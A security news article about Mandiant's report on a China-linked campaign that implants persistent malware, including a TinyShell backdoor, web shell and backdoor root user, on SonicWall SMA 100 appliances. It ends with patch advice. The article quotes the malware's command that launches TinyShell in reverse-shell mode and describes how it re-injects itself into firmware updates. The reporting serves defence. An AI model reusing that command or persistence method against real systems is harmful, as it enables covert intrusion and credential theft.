Researchers have discovered that threat actors linked to the Chinese government are using malware to infect SonicWall’s Secure Mobile Access 100, a popular security appliance, which remains active even after firmware updates.
The Secure Mobile Access 100 is a highly sought-after device for businesses looking to deploy remote workforces. It provides granular access controls to remote users, VPN connections to organizational networks, and the ability to set unique profiles for each employee. Due to the access, it provides to customer networks, the SMA 100 is an attractive target for hackers.
Last year, the SMA 100 was targeted by highly skilled hackers who took advantage of a zero-day vulnerability. Unfortunately, this is not the first time security appliances have been compromised in recent years, with Fortinet and Pulse Secure also falling victim to similar attacks.
Malware gaining persistence
A new report published on Thursday by cybersecurity firm Mandiant has revealed that threat actors, believed to have links to China, are currently executing a targeted campaign to establish long-term persistence by deploying malware on unpatched SonicWall SMA appliances. The campaign has caught the attention of security experts due to the malware’s ability to remain active on the devices even after the firmware has been updated.
“The attackers put significant effort into the stability and persistence of their tooling,” Mandiant researchers wrote. “This allows their access to the network to persist through firmware updates and maintain a foothold on the network through the SonicWall Device.”
In order to maintain its hold on a compromised device, the malicious software implements a clever tactic. The malware constantly scans for new firmware updates, conducting checks every 10 seconds. If an update is detected, the malware springs into action: it makes a backup copy of the archived file, extracts the contents, and then proceeds to copy over its own nefarious files. The malware even adds a backdoor root user to the system, ensuring future access. Finally, the malware rearchives the file, preparing it for installation.
“The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence,” the researchers added.
An attack campaign in 2021 utilized 16 malware families to infiltrate Pulse Secure devices. This campaign displayed persistence techniques, indicating a sophisticated and well-planned operation. Mandiant has attributed these attacks to several threat groups, including UNC2630 and UNC2717. These groups are aligned with “key Chinese government priorities,” but it’s unclear whether the Chinese government is directly involved in the attacks.
Mandiant is now tracking those responsible for the ongoing attacks against SonicWall SMA 100 customers as UNC4540.
“In recent years Chinese attackers have deployed multiple zero-day exploits and malware for a variety of Internet-facing network appliances as a route to full enterprise intrusion, and the instance reported here is part of a recent pattern that Mandiant expects to continue in the near term,” the researchers added in Thursday’s report.
Gaining privileges
The malware’s primary objective seems to be the pilfering of cryptographically hashed passwords for all users who are currently logged into their systems. In addition to this, the malicious software also provides the threat actor with a web shell, which they can leverage to install fresh malware onto the infected device.
Analysis of a compromised device revealed a collection of files that give the attacker a highly privileged and available access to the appliance,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the suite of malicious bash scripts shows a detailed understanding of the appliance and is well-tailored to the system to provide stability and persistence.
The main malware entry point is a bash script named
firewalld
, which executes its primary loop once for a count of every file on the system squared: …for j in $(ls / -R) do for i in $(ls / -R) do:
… The script is responsible for executing an SQL command to accomplish credential stealing and execution of the other components.The first function in
firewalld
executes the TinyShell backdoorhttpsd
with commandnohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &
if thehttpsd
process isn’t already running. This sets TinyShell to reverse-shell mode, instructing it to call out to the aforementioned IP address and port at a specific time and day represented by the-m
flag, with a beacon interval defined by the-d
flag. The binary embeds a hard coded IP address, which is used in reverse-shell mode if the IP address argument is left blank. It also has a listening bind shell mode available.
According to researchers, the source of the initial infection remains a mystery. SonicWall issued a notice last week recommending that SMA 100 users upgrade to version 10.2.1.7 or newer.
These updated versions offer valuable features, such as File Integrity Monitoring and anomalous process identification, which could help detect and prevent further breaches.
The patch is readily available for download on their website. Additionally, users are advised to monitor system logs frequently for any signs of abnormal activity, such as unusual login attempts or internal network traffic. By staying vigilant, users can take proactive steps to protect their systems and data from potential cyber-attacks.